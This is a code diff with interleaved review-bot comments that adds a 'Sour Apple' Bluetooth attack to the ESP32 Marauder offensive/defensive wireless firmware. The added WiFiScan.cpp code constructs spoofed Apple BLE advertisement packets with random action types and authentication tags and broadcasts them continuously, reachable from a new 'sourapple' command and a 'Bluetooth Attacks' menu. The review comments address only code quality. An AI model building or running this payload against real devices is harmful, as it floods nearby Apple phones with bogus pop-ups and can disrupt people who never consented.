diff --git a/README.md b/README.md
index d4eb46ee1..eba2b1c49 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
-# ESP32 Marauder v0.12.1
+# ESP32 Marauder v0.13.0
A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32
diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp
index 75c02a5d3..c4ac82fca 100644
--- a/esp32_marauder/CommandLine.cpp
+++ b/esp32_marauder/CommandLine.cpp
@@ -249,6 +249,7 @@ void CommandLine::runCommand(String input) {
// Bluetooth sniff/scan
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
+ Serial.println(HELP_BT_SOUR_APPLE_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
@@ -771,6 +772,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
+ else if (cmd_args.get(0) == BT_SOUR_APPLE_CMD) {
+ #ifdef HAS_BT
+ Serial.println("Starting Sour Apple attack. Stop with " + (String)STOPSCAN_CMD);
+ #ifdef HAS_SCREEN
+ display_obj.clearScreen();
+ menu_function_obj.drawStatusBar();
+ #endif
+ wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
+ #else
+ Serial.println("Bluetooth not supported");
+ #endif
+ }
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h
index 611c24c7a..157e57973 100644
--- a/esp32_marauder/CommandLine.h
+++ b/esp32_marauder/CommandLine.h
@@ -77,6 +77,7 @@ const char PROGMEM SSID_CMD[] = "ssid";
// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
+const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
@@ -122,6 +123,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r ";
// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
+const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index 3c94dd0ba..e5151bd60 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -494,6 +494,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -550,6 +551,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1073,6 +1075,7 @@ void MenuFunctions::RunSetup()
// Bluetooth menu stuff
bluetoothSnifferMenu.list = new LinkedList();
+ bluetoothAttackMenu.list = new LinkedList();
// Settings stuff
generateSSIDsMenu.list = new LinkedList();
@@ -1095,6 +1098,7 @@ void MenuFunctions::RunSetup()
wifiAttackMenu.name = text_table1[21];
wifiGeneralMenu.name = text_table1[22];
bluetoothSnifferMenu.name = text_table1[23];
+ bluetoothAttackMenu.name = "Bluetooth Attacks";
generateSSIDsMenu.name = text_table1[27];
clearSSIDsMenu.name = text_table1[28];
clearAPsMenu.name = text_table1[29];
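Review bot: The new menu name on the `bluetoothAttackMenu.name` line is a bare string literal while every sibling assignment in this hunk reads from `text_table1[...]`, so the new menu is the only one that bypasses the text table, and the same literal is repeated in the `addNodes(&bluetoothMenu, "Bluetooth Attacks", ...)` call in the next hunk of this file. If `text_table1` is the localisation/indirection point for menu labels, add an entry there and reference it from both places, e.g. `bluetoothAttackMenu.name = text_table1[<new index — fill in>];`, so a later rename only touches one place. RunSetup starts and ends outside this hunk.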
@@ -1371,6 +1375,9 @@ void MenuFunctions::RunSetup()
this->addNodes(&bluetoothMenu, text_table1[31], TFT_YELLOW, NULL, SNIFFERS, [this]() {
this->changeMenu(&bluetoothSnifferMenu);
});
+ this->addNodes(&bluetoothMenu, "Bluetooth Attacks", TFT_RED, NULL, ATTACKS, [this]() {
+ this->changeMenu(&bluetoothAttackMenu);
+ });
// Build bluetooth sniffer Menu
bluetoothSnifferMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
@@ -1402,6 +1409,17 @@ void MenuFunctions::RunSetup()
wifi_scan_obj.StartScan(BT_SCAN_SKIMMERS, TFT_MAGENTA);
});
+ // Bluetooth Attack menu
+ bluetoothAttackMenu.parentMenu = &bluetoothMenu; // Second Menu is third menu parent
+ this->addNodes(&bluetoothAttackMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
+ this->changeMenu(bluetoothAttackMenu.parentMenu);
+ });
+ this->addNodes(&bluetoothAttackMenu, "Sour Apple", TFT_GREEN, NULL, DEAUTH_SNIFF, [this]() {
+ display_obj.clearScreen();
+ this->drawStatusBar();
+ wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
+ });
+
// Device menu
deviceMenu.parentMenu = &mainMenu;
this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() {
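Review bot: The "Sour Apple" node is registered with `DEAUTH_SNIFF` as its fifth argument, which looks copied from a WiFi sniffer node; the other new nodes in this change use `ATTACKS`, `SNIFFERS` or `0` for that argument. If that parameter selects the node's type or icon, `DEAUTH_SNIFF` presumably misclassifies a Bluetooth attack entry — please confirm against `addNodes` and use the constant that matches the menu's intent. The enclosing RunSetup body continues past the end of this hunk.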
diff --git a/esp32_marauder/MenuFunctions.h b/esp32_marauder/MenuFunctions.h
index df45a0eb5..eb814a714 100644
--- a/esp32_marauder/MenuFunctions.h
+++ b/esp32_marauder/MenuFunctions.h
@@ -144,6 +144,7 @@ class MenuFunctions
// Bluetooth menu stuff
Menu bluetoothSnifferMenu;
+ Menu bluetoothAttackMenu;
// Settings things menus
Menu generateSSIDsMenu;
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index 7642ec59a..2bbe73b7c 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -18,6 +18,36 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
}
#ifdef HAS_BT
+ //ESP32 Sour Apple by RapierXbox
+ //Exploit by ECTO-1A
+ NimBLEAdvertising *pAdvertising;
+
+ NimBLEAdvertisementData getOAdvertisementData() {
+ NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
+ uint8_t packet[17];
+ uint8_t size = 17;
+ uint8_t i = 0;
+
+ packet[i++] = size - 1; // Packet Length
+ packet[i++] = 0xFF; // Packet Type (Manufacturer Specific)
+ packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
+ packet[i++] = 0x00; // ...
+ packet[i++] = 0x0F; // Type
+ packet[i++] = 0x05; // Length
+ packet[i++] = 0xC1; // Action Flags
+ const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
+ packet[i++] = types[rand() % sizeof(types)]; // Action Type
+ esp_fill_random(&packet[i], 3); // Authentication Tag
+ i += 3;
+ packet[i++] = 0x00; // ???
+ packet[i++] = 0x00; // ???
+ packet[i++] = 0x10; // Type ???
+ esp_fill_random(&packet[i], 3);
+
+ randomAdvertisementData.addData(std::string((char *)packet, 17));
+ return randomAdvertisementData;
+ }
+
class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
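Review bot: `NimBLEAdvertising *pAdvertising;` is a namespace-scope definition with external linkage and no explicit initialiser, and `getOAdvertisementData` is likewise exported from the .cpp; both should be file-local, and the pointer should be explicitly null so later code can test it: `static NimBLEAdvertising *pAdvertising = nullptr;` and `static NimBLEAdvertisementData getOAdvertisementData() {`. The buffer length `17` is spelled three times (`packet[17]`, `size = 17`, `std::string(..., 17)`); deriving it once with `sizeof(packet)` — e.g. `randomAdvertisementData.addData(std::string(reinterpret_cast<char *>(packet), sizeof(packet)));` — keeps the header byte and the copied length from drifting apart if the layout changes. The three `// ???` comments mean the trailing fields are undocumented; either name what they are or mark them as `// TODO: meaning unknown, taken from upstream payload` so a reader does not mistake them for documented values.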
@@ -412,6 +442,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunBluetoothScan(scan_mode, color);
#endif
}
+ else if (scan_mode == BT_ATTACK_SOUR_APPLE) {
+ #ifdef HAS_BT
+ RunSourApple(scan_mode, color);
+ #endif
+ }
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
@@ -515,10 +550,11 @@ bool WiFiScan::shutdownWiFi() {
bool WiFiScan::shutdownBLE() {
#ifdef HAS_BT
if (this->ble_initialized) {
+ pAdvertising->stop();
pBLEScan->stop();
pBLEScan->clearResults();
- BLEDevice::deinit();
+ NimBLEDevice::deinit();
#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
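Review bot: The added `pAdvertising->stop();` dereferences the file-scope pointer unconditionally, but that pointer is only assigned in `RunSourApple`, so a `sniffbt`, wardrive or skimmer session (which also sets `ble_initialized`) followed by a stop now hits a null pointer on this line. Guard it and clear it in the same step, `if (pAdvertising != nullptr) { pAdvertising->stop(); pAdvertising = nullptr; }`, since the object is presumably owned by the NimBLE device that `NimBLEDevice::deinit()` tears down on the following line and the pointer would otherwise dangle into the next session. shutdownBLE continues past the end of this hunk.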
@@ -574,6 +610,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
else if ((currentScanMode == BT_SCAN_ALL) ||
+ (currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
@@ -1359,6 +1396,15 @@ void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}
+void WiFiScan::executeSourApple() {
+ delay(40);
+ NimBLEAdvertisementData advertisementData = getOAdvertisementData();
+ pAdvertising->setAdvertisementData(advertisementData);
+ pAdvertising->start();
+ delay(20);
+ pAdvertising->stop();
+}
+
void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
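Review bot: `executeSourApple` uses `pAdvertising` with no check, yet it is reached from `main()` purely on `currentScanMode`, and the pointer is only valid between `RunSourApple` and `shutdownBLE`; add `if (pAdvertising == nullptr) return;` as the first statement so a mode/pointer mismatch fails closed instead of crashing. A one-line header comment would also help, e.g. `// One advertising burst; requires RunSourApple() to have set pAdvertising.` Note that the two `delay()` calls block the loop that `main()` runs in, which is worth documenting on the function since it affects how quickly a stop command is honoured.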
@@ -1708,6 +1754,31 @@ void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
initTime = millis();
}
+void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
+ #ifdef HAS_BT
+ NimBLEDevice::init("");
+ NimBLEServer *pServer = NimBLEDevice::createServer();
+
+ pAdvertising = pServer->getAdvertising();
+
+ #ifdef HAS_SCREEN
+ display_obj.TOP_FIXED_AREA_2 = 48;
+ display_obj.tteBar = true;
+ display_obj.print_delay_1 = 15;
+ display_obj.print_delay_2 = 10;
+ display_obj.initScrollValues(true);
+ display_obj.tft.setTextWrap(false);
+ display_obj.tft.setTextColor(TFT_BLACK, color);
+ display_obj.tft.fillRect(0,16,240,16, color);
+ display_obj.tft.drawCentreString("Sour Apple",120,16,2);
+ display_obj.touchToExit();
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ #endif
+
+ this->ble_initialized;
+ #endif
+}
+
// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
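Review bot: `this->ble_initialized;` near the end of `RunSourApple` is an expression statement with no effect — the flag is read and discarded — so `shutdownBLE`, which is gated on `ble_initialized`, never stops advertising or calls `NimBLEDevice::deinit()` after a Sour Apple session. It should read `this->ble_initialized = true;`; most compilers will flag the current line with `-Wunused-value`, so it is worth enabling that warning in the build. The `scan_mode` parameter is unused here; if it is kept only for signature parity with the other `Run*` functions, say so with `(void)scan_mode; // kept for Run* signature parity`.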
@@ -4033,6 +4104,25 @@ void WiFiScan::main(uint32_t currentTime)
channelHop();
}
}
+ else if (currentScanMode == BT_ATTACK_SOUR_APPLE) {
+ #ifdef HAS_BT
+ if (currentTime - initTime >= 1000) {
+ initTime = millis();
+ String displayString = "";
+ String displayString2 = "";
+ displayString.concat("Advertising Data...");
+ for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+ displayString2.concat(" ");
+ #ifdef HAS_SCREEN
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ display_obj.showCenterText(displayString2, 160);
+ display_obj.showCenterText(displayString, 160);
+ #endif
+ }
+
+ this->executeSourApple();
+ #endif
+ }
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
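Review bot: The status text in the new `BT_ATTACK_SOUR_APPLE` branch is built as `String displayString = "";` followed by `displayString.concat("Advertising Data...");`, which can simply be `String displayString = "Advertising Data...";`; the padding loop for `displayString2` is fine but would read better with a comment such as `// blank line of STANDARD_FONT_CHAR_LIMIT spaces to clear the previous text`. The branch calls `this->executeSourApple()` on every pass regardless of the one-second display timer, which is presumably intended; a short comment stating that the display refresh and the advertising call are deliberately on different cadences would prevent a later reader from "fixing" it. WiFiScan::main starts and ends outside this hunk.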
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index be65731e1..6392388e6 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -81,6 +81,7 @@
#define WIFI_SCAN_STATION_WAR_DRIVE 33
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
+#define BT_ATTACK_SOUR_APPLE 36
#define GRAPH_REFRESH 100
@@ -249,6 +250,7 @@ class WiFiScan
void save_mac(unsigned char* mac);
void clearMacHistory();
void executeWarDrive();
+ void executeSourApple();
void startWardriverWiFi();
void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
@@ -281,6 +283,7 @@ class WiFiScan
void RunProbeScan(uint8_t scan_mode, uint16_t color);
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
+ void RunSourApple(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h
index 5ec75dd26..070aeb2c1 100644
--- a/esp32_marauder/configs.h
+++ b/esp32_marauder/configs.h
@@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS
- #define MARAUDER_VERSION "v0.12.2"
+ #define MARAUDER_VERSION "v0.13.0"
//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC